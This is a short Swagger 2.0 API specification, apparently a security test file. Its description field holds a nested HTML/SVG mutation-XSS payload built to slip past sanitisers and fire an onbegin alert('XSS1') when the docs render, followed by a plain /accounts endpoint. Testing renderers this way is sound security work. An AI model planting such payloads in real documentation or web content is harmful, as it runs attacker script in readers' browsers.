swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: <form><math><h1>BU0</h1><mtext></form><form><mglyph><svg><animate attributeName="opacity" from="0" to="1" begin="0s" dur="0.1s" fill="freeze" 
    onbegin="alert('XSS1')"/><mtext><h1>BU1</h1><textarea><desc id="</textarea><math><mtext><h1>BU</h1>">

  version: production
basePath: /test-c4sper0
security:
  - basicAuth: []
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
